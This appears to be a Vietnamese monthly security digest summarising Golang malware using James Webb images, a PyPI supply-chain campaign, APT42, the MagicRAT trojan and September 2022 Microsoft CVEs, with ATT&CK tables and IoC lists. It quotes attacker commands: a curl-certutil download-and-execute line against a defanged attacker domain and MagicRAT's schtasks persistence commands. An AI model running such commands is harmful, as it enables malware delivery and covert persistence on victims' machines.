Hàng tháng, Chúng tôi – NCS tổng hợp lại các thông tin về bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài tổng hợp.
1 Các mối đe dọa nâng cao – Advanced Threats
1.1 GO#WEBBFUSCATOR: Chiến dịch tấn công Golang mới sử dụng Office Macros và hình ảnh James Webb
Ngày 29/08, Nhóm nghiên cứu mối đe dọa của Securonix (STR) đã phát hiện một chiến dịch tấn công mới sử dụng mã độc dựa trên Golang. Securonix đặt tên cho chiến dịch này là GO#WEBBFUSCATOR.
Chiến dịch mới kết hợp một chiến lược thú vị bằng cách sử dụng hình ảnh nổi tiếng được chụp từ kính thiên văn James Webb và ngôn ngữ lập trình Golang bị làm xáo trộn để lây nhiễm phần mềm độc hại vào hệ thống mục tiêu.
Phương thức lây nhiễm bắt đầu bằng một email lừa đảo chứa tệp đính kèm Microsoft Office. Tệp tài liệu này sẽ tải xuống một tệp độc hại khác (form.dotm) từ một liên kết giả dạng một URL hợp pháp của Microsoft.
hxxp: //www.xmlschemeformat.com/update/2021/Office/form.dotm
URL hợp lệ có dạng: http://schemas.openxmlformats.org/
Tệp form.dotm chứa tập lệnh VB sẽ tự động thực thi khi người dùng bật macro. Nhiệm vụ của tập lệnh VB là tải xuống 1 tệp hình ảnh “OxB36F8GEEC634.jpg”, sau đó sử dụng certutil.exe để giải mã nó thành tệp nhị phân (msdllupdate.exe) và thực thi tệp nhị phân.
cmd.exe / c cd c: \ users \ test \ appdata \ local & curl hxxp: // www [.] xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe
Tệp msdllupdate.exe, được biên dịch bằng Golang, là tệp thực thi Windows 64-bit có kích thước lớn, khoảng 1,7MB, sử dụng một số kỹ thuật làm xáo trộn để không bị AV phát hiện và gây khó khăn cho việc phân tích.
Phương pháp mã hóa ROT25 được sử dụng để xáo trộn các chuỗi ký tự. Ví dụ: A = Z và 1 = 6. Ngoài ra, tệp msdllupdate.exe được xáo trộn bằng cách sử dụng một kỹ thuật hiện đại chống lại việc phân tích được gọi là Gobfuscation. Các mã Golang Assemblies được mã hóa bằng XOR với độ lệch byte 0x20.
Tệp msdllupdate.exe có chức năng tạo và duy trì kết nối tới máy chủ C&C để nhận lệnh điều khiển từ kẻ tấn công.
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Initial Access | T1566.001 | Phishing: Spearphishing Attachment |
Execution | T1059.03 | Windows Command Shell |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
Discovery | T1420 | File and Directory Discovery |
Discovery | T1016.001 | System Network Configuration Discovery |
Discovery | T1426 | System InformationDiscovery |
Discovery | T1033 | System Owner/User Discovery |
Command and Control | T1071.001 | Web Protocols |
T1071.004 | Application Layer Protocol: DNS | |
Command and Control | T1132.001 | Standard Encoding |
Command and Control | T1105 | Ingress Tool Transfer |
Command and Control | T1001.002 | Data Obfuscation: Steganography |
Exfiltration | T1041 | Exfiltration Over C2 Channel |
Indicators of Compromise (IoCs)
Files / hash SHA 256
%LOCALAPPDATA%\microsoft\vault\Msdllupdate.exe
%LOCALAPPDATA%\microsoft\vault\Update.bat
%LOCALAPPDATA%\microsoft\windows\MsSafety\Msdllupdate.exe
%LOCALAPPDATA%\microsoft\vault\MsDb.db
da43ec30fe12c45529e51a0c986a856aa8772483875356f29382ac514788f86d
383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f
3bdf6d9f0f35be75d8345d897ec838ae231ba01ae898f6d0c8f920ff4061fc22
d09af37cdbae7273e4e7c79b242023ffdb07c8ccab2280db7fe511d2b14ad19c
C2 Domain
Xmlschemeformat.com
Updatesagent.com
Apiregis.com
185.247.209.255
139.28.36.222
1.2 Chiến dịch lừa đảo PyPI | JuiceLedger chuyển từ ứng dụng giả mạo đến các cuộc tấn công chuỗi cung ứng
Ngày 1/09/2022, SentinelLabs đã thông báo hợp tác với Checkmarx để theo dõi hoạt động của một nhóm đe dọa có tên là “JuiceLedger”. Vào đầu năm 2022, JuiceLedger bắt đầu chạy các chiến dịch nhỏ, phát tán các ứng dụng trình cài đặt Python lừa đảo với ‘JuiceStealer’, một ứng dụng .NET được thiết kế để đánh cắp dữ liệu nhạy cảm từ trình duyệt của nạn nhân.
Vào tháng 8 năm 2022, JuiceLedger đã thực hiện một cuộc tấn công chuỗi cung ứng vào những người đóng góp gói PyPi trong một chiến dịch lừa đảo và đầu độc các gói mã nguồn mở (gọi tắt: gói) để nhắm mục tiêu đến nhiều đối tượng hơn. JuiceLedger đã đầu độc thành công ít nhất hai gói hợp pháp bằng phần mềm độc hại. JuiceLedger cũng sử dụng kỹ thuật typosquatting để phát tán hàng trăm gói độc hại khác.
Hình 1.2.1: Chuỗi tấn công
Các email lừa đảo hướng nạn nhân đến một trang web Google giả mạo trang đăng nhập PyPI. Khi người dung nhập thông tin đăng nhập, thông tin sẽ được gửi đến miền linkedopports[.]com của JuiceLedger.
Các gói độc hại được JuiceLedger tải lên trong chiến dịch tháng 8 chứa một đoạn mã ngắn, chịu trách nhiệm tải xuống và thực thi một biến thể đã ký của JuiceStealer.
JuiceStealer, là một ứng dụng .NET tương đối đơn giản, có tên nội bộ là “meta”. Những dấu hiệu đầu tiên về JuiceStealer bắt đầu xuất hiện vào tháng Hai năm nay. JuiceStealer đã được nhúng vào một số ứng dụng và trình cài đặt lừa đảo.
Trình cài đặt Python:
- Phiên bản đầu tiên của JuiceStealer bắt chước trình cài đặt Python.
- Mẫu này tìm kiếm các quy trình có chứa từ “chrome”, tắt chúng và sau đó tìm kiếm tệp nhật ký Tiện ích mở rộng của Google Chrome. Nó tìm trong các tệp nhật ký có chứa từ “vault”, có thể là tìm kiếm các cryptocurrency vaults và gửi cho máy chủ C2 qua HTTP.
- Đồng thời nó cũng tìm kiếm mật khẩu Google Chrome, truy vấn tệp SQLite của Chrome
Ứng dụng lừa đảo – Tesla Trading Bot:
- JuiceLedger bắt đầu sử dụng các ứng dụng lừa đảo trực tiếp theo chủ đề tiền điện tử, trong số đó, một ứng dụng mà chúng đặt tên là “Tesla Trading bot”
- Cơ chế lây nhiễm tương tự như Trình cài đặt Python, nó được nhúng trong một tệp zip cùng với các phần mềm hợp pháp.
PyPI đã tuyên bố rằng họ đang tích cực xem xét các báo cáo về các gói độc hại và đã gỡ bỏ hàng trăm gói độc hại. Những người bảo trì gói được khuyến nghị sử dụng xác thực 2FA trên tài khoản của họ.
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Resource Development | T1583.001 | Acquire Infrastructure: Domains |
Initial Access | T1566.002 | Phishing: Spearphishing Link |
Initial Access | T1195 | Supply Chain Compromise |
Execution | T1204.002 | User Execution: Malicious File |
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
Execution | T1059.006 | Command and Scripting Interpreter: Python |
Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location |
Defense Evasion | T1027 | Obfuscated Files or Information |
Defense Evasion | T1218.005 | System Binary Proxy Execution: Mshta |
Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers |
Command and Control | T1071.001 | Web Protocols |
Exfiltration | T1041 | Exfiltration Over C2 Channel |
Indicators of Compromise (IoCs)
Files / hash SHA1
90b7da4c4a51c631bd0cbe8709635b73de7f7290
dd569ccfe61921ab60323a550cc7c8edf8fb51d8
97c541c6915ccbbc8c2b0bc243127db9b43d4b34
f29a339e904c6a83dbacd8393f57126b67bdd3dd
71c849fc30c1abdb49c35786c86499acbb875eb5
2fb194bdae05c259102274300060479adf3b222e
5eb92c45e0700d80dc24d3ad07a7e2d5b030c933
e5286353dec9a7fc0c6db378b407e0293b711e9b
cbc47435ccc62006310a130abd420c5fb4b278d2
8bbf55a78b6333ddb4c619d615099cc35dfeb4fb
bac2d08c542f82d8c8720a67c4717d2e70ad4cd9
567e1d5aa3a409a910631e109263d718ebd60506
1e697bc7d6a9762bfec958ee278510583039579c
ea14f11e0bd36c2d036244e0242704f3cf721456
5703ed6565888f0b06fffcc40030ba679936d29f
cd0b8746487d7ede0ec07645fd4ec655789c675b
d3ed1c7c0496311bb7d1695331dc8d3934fbc8ec
0a6731eba992c490d85d7a464fded2379996d77c
a30df748d43fbb0b656b6898dd6957c686e50a66
52b7e42e44297fdcef7a4956079e89810f64e113
aa8c4dffeeacc1f7317b2b3537d2962e8165faa2
a6348aea65ad01ee4c7dd70b0492f308915774a3
b305c16cb2bc6d88b5f6fe0ee889aaf8674d686e
666e5554ccdafcb37a41f0623bb9acc53851d84f
463897fa2dd2727a930b8f3397d10a796b6aa0d6
e2e239f40fdb2e5bf9d37b9607b152f173db285c
c0e3c2436e225f7d99991a880bf37d32ff09c5bd
6f3c5a06d1a53fac45182e76897e7eab90d4a186
bd7eb97b3dc47e72392738d64007df5fc29de565
de4596669f540b8bd34aa7cbf50e977f04f3bba3
55ba11f522532d105f68220db44392887952e57b
9e9c6af67962b041d2a87f2abec7a068327fa53a
ed9a4ce2d68d8cc9182bb36a46d35a9a8d0510cb
f10006f7b13e4746c2293a609badd2d4e5794922
f07954ba3932afd8ad7520c99a7f9263aa513197
56e3421689d65e78ff75703dd6675956b86e09e8
004c66532c49cb9345fc31520e1132ffc7003258
6fe5f25205679e148b7b93f1ae80a659d99c7715
964e29e877c65ff97070b7c06980112462cd7461
225638350f089ee56eae7126d048b297fce27b7d
9fb18a3426efa0034f87dadffe06d490b105bda3
a78dd3cd9569bd418d5db6f6ebf5c0c5e362919b
d249f19db3fe6ea4439f095bfe7aafd5a0a5d4d2
C2 Domain
linkedopports.com
ledgrestartings.com
python-release.com
thefutzibag.com
ledge-pc.com
trezsetup.com
axiesinfintity.com
campus-art.com
teslatradingbot.com
barkbackbakery.com
capritagworld.com
ideasdays.com
1.3 Phân tích hoạt động của nhóm APT42
Ngày 07/09/2022, Mandiant đã đưa ra báo cáo về nhóm APT42, một nhóm gián điệp mạng do nhà nước Iran tài trợ được giao nhiệm vụ tiến hành các hoạt động thu thập thông tin và giám sát chống lại các cá nhân và các tổ chức có lợi ích chiến lược đối với chính phủ Iran. Mandiant tin rằng APT42 thực hiện các hoạt động tình báo thay mặt cho Lực lượng Vệ binh Cách mạng Hồi giáo (IRGC).
Hoạt động ít nhất từ năm 2015, APT42 có đặc điểm là các hoạt động giám sát và lừa đảo nhắm mục tiêu cao vào cá nhân và tổ chức có lợi ích chiến lược đối với Iran. Chúng thường xây dựng lòng tin và mối quan hệ với nạn nhân, các quan chức chính phủ, các nhà hoạch định chính sách cũ của Iran hoặc các nhân vật chính trị, các thành viên của cộng đồng người Iran và các nhóm đối lập, các nhà báo và học giả có liên quan đến nghiên cứu về Iran.
Sau khi giành được quyền truy cập, chúng triển khai phần mềm độc hại trên điện thoại di động của nạn nhân để theo dõi vị trí, ghi lại cuộc trò chuyện điện thoại, truy cập video và hình ảnh cũng như trích xuất toàn bộ hộp thư đến SMS.
Cùng với việc thu thập thông tin đăng nhập, APT42 cũng phát triển một số phần mềm độc hại, backdoor tùy chỉnh và các công cụ có kích thước nhỏ. Mandiant đánh giá rằng APT42 có tài nguyên phát triển phần mềm độc hại có hạn vì các họ phần mềm độc hại gần đây như TABBYCAT và VBREVSHELL đã bao gồm hoặc phần lớn bao gồm mã có sẵn công khai được sao chép từ các dự án GitHub.
Hình 1.3.1: Các hoạt động chính của APT42
Hình 1.3.2: APT42 Attack Lifecycle
Initial Compromise
Bước đầu, APT42 chủ yếu dựa vào lừa đảo trực tuyến để đạt được thông tin đăng nhập của nạn nhân. APT42 có khả năng vượt qua MFA và chặn mật khẩu một lần gửi qua SMS bằng các biểu mẫu thu thập thông tin đăng nhập và phân phối phần mềm độc hại Android qua tin nhắn SMS.
- APT42 thường xuyên mạo danh các nhà báo nổi tiếng hoặc các nhân vật công chúng yêu cầu phỏng vấn với các mục tiêu. Trong một trường hợp, APT42 đã trao đổi với mục tiêu trong 37 ngày trước khi gửi cho họ một liên kết rút gọn URL được chuyển hướng đến trang thu thập thông tin đăng nhập.
- APT42 gửi email lừa đảo có đính kèm tệp PDF hoặc liên kết đến tệp PDF trên Google Drive hoặc Dropboxhosted với liên kết được nhúng tới trang thu thập thông tin đăng nhập.
- Nhóm có khả năng chặn mã xác thực MFA thông qua các biểu mẫu thu thập thông tin đăng nhập.
Establish Foothold
Sau khi xác thực thành công tài khoản email cá nhân hoặc công ty của nạn nhân, APT42 đăng ký ứng dụng Authenticator Microsoft như một phương pháp MFA mới. APT42 sử dụng nhiều loại phần mềm độc hại có kích thước nhỏ, một số dựa trên các tập lệnh có sẵn công khai. Ví dụ:
- BROKEYOLK
- CHAIRSMACK
- GHAMBAR
- MAGICDROP
- POWERPOST
- PINEFLOWER
- TABBYCAT
- TAMECAT
- VBREVSHELL
- VINETHORN
Escalate Privileges
APT42 sử dụng phần mềm độc hại tùy chỉnh có khả năng ghi lại các lần gõ phím và đánh cắp thông tin đăng nhập và dữ liệu cookie từ các trình duyệt phổ biến để leo thang đặc quyền trong môi trường nạn nhân. Ví dụ:
- CHAIRSMACK
- DOSTEALER
- GHAMBAR
Internal Reconnaissance
Sau khi đăng nhập vào môi trường của mục tiêu, APT42 tiến hành trinh sát nội bộ bằng cách duyệt qua danh bạ của nạn nhân và truy cập vào không gian cộng tác của tổ chức bị nhắm mục tiêu, chẳng hạn như Sharepoint. APT42 cũng đăng nhập vào các tài khoản Microsoft Outlook và đánh cắp toàn bộ thông tin email của nạn nhân. Từ đó chúng có thể gửi email tấn công lừa đảo tới các mục tiêu khác dễ dàng hơn.
APT42 cũng sử dụng phần mềm độc hại có khả năng chụp ảnh màn hình và thu thập thông tin hệ thống và mạng, bao gồm:
- GHAMBAR
- POWERPOST
Lateral Movement
APT42 thường cố gắng sử dụng tài khoản email cá nhân của nạn nhân để truy cập vào các tài khoản công ty khác của nạn nhân và ngược lại. Chúng sẽ gửi các email lừa đảo từ các tài khoản email bị xâm nhập đến các tài khoản khác cả bên trong và bên ngoài tổ chức được nhắm mục tiêu.
Maintain Presence
Để duy trì trong môi trường của nạn nhân, APT42 dựa vào phần mềm độc hại tùy chỉnh và tạo các tác vụ được lên lịch hoặc sửa đổi sổ đăng ký Windows để chạy phần mềm độc hại, bao gồm:
- CHAIRSMACK
- GHAMBAR
Complete Mission
Mandiant đánh giá rằng mục tiêu của APT42 là:
- APT42 tìm cách đánh cắp thông tin đăng nhập tài khoản email cá nhân và công ty. Chúng sử dụng các thông tin đăng nhập đó để thực hiện các hoạt động theo dõi và lấy cắp tài liệu cá nhân hoặc doanh nghiệp và nghiên cứu phù hợp với Iran.
- APT42 tìm cách theo dõi các vị trí, giám sát các liên lạc qua điện thoại và email và thường khảo sát các hoạt động của các cá nhân quan tâm đến chính phủ Iran, bao gồm các nhà hoạt động và những người bất đồng chính kiến ở Iran.
ATT&CK MATRIX
TACTIC | TECHNIQUE | NAME |
Resource Development | T1583.003 | Acquire Infrastructure: Virtual Private Server |
Resource Development | T1584 | Compromise Infrastructure |
Resource Development | T1587.003 | Develop Capabilities: Digital Certificates |
Resource Development | T1588.004 | Obtain Capabilities: Digital Certificates |
Initial Access | T1566.001 | Phishing: Spearphishing Attachment |
Initial Access | T1566.002 | Spear-phishing Link |
Initial Access | T1133 | External Remote Services |
Execution | T1047 | Windows Management Instrumentation |
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic |
Execution | T1059.007 | Command and Scripting Interpreter: JavaScript/Jscript |
Execution | T1569.002 | System Services: Service Execution |
Execution | T1204.001 | User Execution: Malicious Link |
Execution | T1204.002 | User Execution: Malicious File |
Persistence | T1098.002 | Account Manipulation: Exchange Email Delegate Permissions |
Persistence | T1133 | External Remote Services |
Persistence | T1543.003 | Create or Modify System Process: Windows Service |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Privilege Escalation | T1055 | Process Injection |
Privilege Escalation | T1134 | Access Token Manipulation |
Privilege Escalation | T1543.003 | Create or Modify System Process: Windows Service |
Privilege Escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Privilege Escalation | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL |
Defense Evasion | T1027.002 | Obfuscated Files or Information: Software Packing |
Defense Evasion | T1027.005 | Obfuscated Files or Information: Indicator Removal from Tools |
Defense Evasion | T1055 | Process Injection |
Defense Evasion | T1070.004 | Indicator Removal on Host: File Deletion |
Defense Evasion | T1112 | Modify Registry |
Defense Evasion | T1134 | Access Token Manipulation |
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
Defense Evasion | T1221 | Template Injection |
Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Defense Evasion | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion |
Defense Evasion | T1564.003 | Hide Artifacts: Hidden Window |
Credential Access | T1003 | OS Credential Dumping |
Credential Access | T1111 | Two-Factor Authentication Interception |
Credential Access | T1056.001 | Input Capture: Keylogging |
Discovery | T1012 | Query Registry |
Discovery | T1016 | System Network Configuration Discovery |
Discovery | T1082 | System Information Discovery |
Discovery | T1083 | File and Directory Discovery |
Discovery | T1087.001 | Account Discovery: Local Account |
Discovery | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Discovery | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion |
Discovery | T1518 | Software Discovery |
Lateral Movement | T1021.001 | Remote Services: Remote Desktop Protocol |
Lateral Movement | T1021.004 | Remote Services: SSH |
Collection | T1056.001 | Input Capture: Keylogging |
Collection | T1113 | Screen Capture |
Collection | T1115 | Clipboard Data |
Collection | T1123 | Audio Capture |
Collection | T1125 | Video Capture |
Collection | T1213 | Data from Information Repositories: Sharepoint |
Collection | T1560.002 | Archive Collected Data: Archive via Library |
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols |
Command and Control | T1071.002 | Application Layer Protocol: File Transfer Protocols |
Command and Control | T1095 | Non-Application Layer Protocol |
Command and Control | T1102 | Web Service |
Command and Control | T1105 | Ingress Tool Transfer |
Command and Control | T1132 | Data Encoding: Standard Encoding |
Command and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptographic |
Exfiltration | T1041 | Exfiltration over C2 Channel |
Impact | T1529 | System Shutdown/Reboot |
Indicators of Compromise (IoCs)
Files / hash MD5
da7d37bfb899a0094995944d4c5e2f21
df02a8a7cb2afb80cc2b789d96f02715
3d67ce57aab4f7f917cf87c724ed7dab
04a6997f0a8021b773ebb49977bc625f
34d37f64613f3fe00086ac8d5972db89
8e0eb3ceb1bbe736beaf64353dda1908
63cd07e805bcd4135a8e3a29fa3ceebd
0a3f454f94ef0f723ac6a4ad3f5bdf01
ae797446710e375f0fc9a33432d64256
60e6523d29e8a9b83f4503f2e7fd7e1d
00b5d45433391146ce98cd70a91bef08
335849d8fb13a4a189ba92af9bdf5d1d
9d0e761f3803889dc83c180901dc7b22
f3d25b1cedf39beee751eb9b2d8d2376
a04c2c3388da643ef67504ef8c6907fb
96444ed552ea5588dffca6a5a05298e9
afb5760c05db35a34c5dc41108ba72c2
d30abec551b0fb512dc2c327eeca3c43
bdf188b3d0939ec837987b4936b19570
651d72776c0394693c25b1e3c9ec55d0
b7bc6a853f160df2cc64371467ed866d
88df70a0e21fb48e0f881fb91a2eaade
9a1e09b7ce904eefb83dc8d7571826f9
9bd1caf6b79f6a69981a15d649a04c19
3c6302fb6bdb953e2073a54b928fad9c
bdf188b3d0939ec837987b4936b19570
651d72776c0394693c25b1e3c9ec55d0
b7bc6a853f160df2cc64371467ed866d
8a847b0f466b3174741aac734989aa73
Nguồn: https://www.mandiant.com/resources/reports/apt42-spear-phishing-and-surveillance
2 Malware
2.1 Phân tích trojan “MagicRAT”
Nhóm Cisco Talos đã phát hiện ra một trojan truy cập từ xa (RAT) mới có tên “MagicRAT”, được chính phủ Hoa Kỳ tin rằng mã độc được phát triển bởi nhóm Lazarus – một tổ chức do nhà nước Bắc Triều Tiên bảo trợ.
MagicRAT được viết bằng ngôn ngữ C++, phiên bản 32 bit được biên dịch với GCC v3.4 sử dụng mingw / cygwin để hỗ trợ trên nền tảng Microsoft Windows, phiên bản 64 bit được biên dịch bằng VisualC64, phiên bản 7.14
File cấu hình được lưu trữ trong file “visual.1991-06.com.microsoft_sd.kit” nằm tại đường dẫn “\ ProgramData \ WindowsSoftwareToolkit”, gồm một số thông tin sau:
- [os] chứa thông tin command and control (C2) URLs.
- [General] chứa các thông tin chung.
- [company] lưu trữ dữ liệu được sử dụng trong quá trình giao tiếp với C2.
Các URL được lưu trữ trong file cấu hình được gắn với các định danh lần lượt là windows, linux và mac. Các giá trị trong các định danh này được bắt đầu với chuỗi “LR02DPt22R” theo sau là URL được encode bằng base64. Sau khi thực thi, MagicRAT thực hiện persistence – tạo lập lịch trên máy nạn nhân bằng schtasks
schtasks /create /tn “OneDrive AutoRemove” /tr “C:\Windows\System32\cmd.exe /c del /f /q C:/TEMP/[MagicRAT_file_name].exe” /sc daily /st 10:30:30 /ru SYSTEM
schtasks /create /tn “Microsoft\Windows\light Service Manager” /tr C:/TEMP/[MagicRAT_file_name].exe /sc onstart /ru SYSTEM
%HOME%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/OneNote.lnk
Sau quá trình persistence , RAT kết nối tới máy chủ C2. Giai đoạn ban đầu, MagicRAT thực hiện thu thập thông tin hệ thống, được thực hiện bằng các câu lệnh whoami, systeminfo và ipconfig /all. Dữ liệu được trả về file zero_dump.mix sẽ được tải lên máy chủ C2. Một số biến thể khác của Magic RAT có tính năng tự xóa bản thân bằng file BAT
Mã độc có thể tải thêm các payload mới từ địa chỉ 64 [.] 188 [.] 27 [.] 73. Trên địa chỉ này lưu trữ các payload bao gồm Tiger RAT và file thực thi có tên file giả mạo định dạng file GIF. Một trong những tệp GIF được phát hiện máy chủ C2 của MagicRAT có tên “pct.gif” là một port scanner, nhận 3 tham số: IP để kết nối, số cổng và dữ liệu trả về. Nếu kết nối thành công, kết trả trả về là “Connection success!” thông qua standard output hoặc ghi vào file “Ahnupdate.log” trong thưc mục tmp
Một payload khác trên máy chủ C2 là TigerRAT, bao gồm một số tính năng sau:
- Thu thập thông tin hệ thống: tên người dùng, tên máy tính, thông tin cấu hình mạng, thông tin hệ thống bao gồm sản phẩm và phiên bản.
- Chạy các lệnh tùy ý trên máy nạn nhân: set / get CWD thông qua tiến trình cmd.exe
- Chụp ảnh màn hình.
- Cấu hình Socks tunneling.
- Keylogging.
- Quản lý file: liệt kê ổ đĩa, xóa file, tạo và ghi vào file, đọc file và tải nội dung lên C2
- Tự xóa / gỡ cài đặt khỏi hệ thống.
Indicators of Compromise (IoCs)
MagicRAT
f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332
TigerRAT
f78cabf7a0e7ed3ef2d1c976c1486281f56a6503354b87219b466f2f7a0b65c4
1f8dcfaebbcd7e71c2872e0ba2fc6db81d651cf654a21d33c78eae6662e62392
bffe910904efd1f69544daa9b72f2a70fb29f73c51070bde4ea563de862ce4b1
196fb1b6eff4e7a049cea323459cfd6c0e3900d8d69e1d80bffbaabd24c06eba
TigerRAT unpacked
1c926fb3bd99f4a586ed476e4683163892f3958581bf8c24235cd2a415513b7f
f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c
23eff00dde0ee27dabad28c1f4ffb8b09e876f1e1a77c1e6fb735ab517d79b76
ca932ccaa30955f2fffb1122234fb1524f7de3a8e0044de1ed4fe05cab8702a5
Port Scanner
d20959b615af699d8fff3f0087faade16ed4919355a458a32f5ae61badb5b0ca
URLs
hxxp[://]64[.]188[.]27[.]73/adm_bord/login_new_check[.]php
hxxp[://]gendoraduragonkgp126[.]com/board/index[.]php
hxxp[://]64[.]188[.]27[.]73/board/mfcom1.gif
hxxp[://]64[.]188[.]27[.]73/board/pct.gif
hxxp[://]64[.]188[.]27[.]73/board/logo_adm_org.gif
hxxp[://]64[.]188[.]27[.]73/board/tour_upt.html
IPs
193[.]56[.]28[.]251
52[.]202[.]193[.]124
64[.]188[.]27[.]73
151[.]106[.]2[.]139
66[.]154[.]102[.]91
Nguồn tham khảo: https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html
3 CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – September 2022
Trong tháng 9, Microsoft đã phát hành các bản vá cho 64 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Azure và Azure Arc; .NET, Visual Studio và .NET Framework; Microsoft Edge (Chromium-based); Office và Office Components; Windows Defender và Linux Kernel. Trong đó có 5 lỗ hổng được đánh giá mức độ Nghiêm trọng, 57 lỗ hổng được đánh giá là Improtant
Dưới đây là một số CVE nổi bật được đánh giá ở mức độ Critical và Improtant:
3.1.1 CVE-2022-34718 – Windows TCP/IP Remote Code Execution Vulnerability
CVSS v3: 9.8/10
Mô tả: Lỗ hổng cho phép kẻ tấn công không cần xác thực thực thi mã từ xa với đặc quyền hệ thống, ảnh hưởng tới hệ thống cấu hình enable IPv6 và IPSec.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 Azure Edition Core Hotpatch
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34718
3.1.2 CVE-2022-37969 – Windows Common Log File System Driver Elevation of Privilege VulnerabilityCVSS
CVSS v3: 7.8/10
Mô tả: Lỗ hổng leo thang đặc quyền tồn tại trong Common Log File System (CLFS), cho phép kẻ tấn công thực thi các đoạn mã độc hại bằng quyền SYSTEM
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 Azure Edition Core Hotpatch
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969
3.1.3 CVE-2022-37962 – Microsoft PowerPoint Remote Code Execution Vulnerability.
CVSS v3: 7.8/10
Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng
Phiên bản ảnh hưởng:
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC for Mac 2021
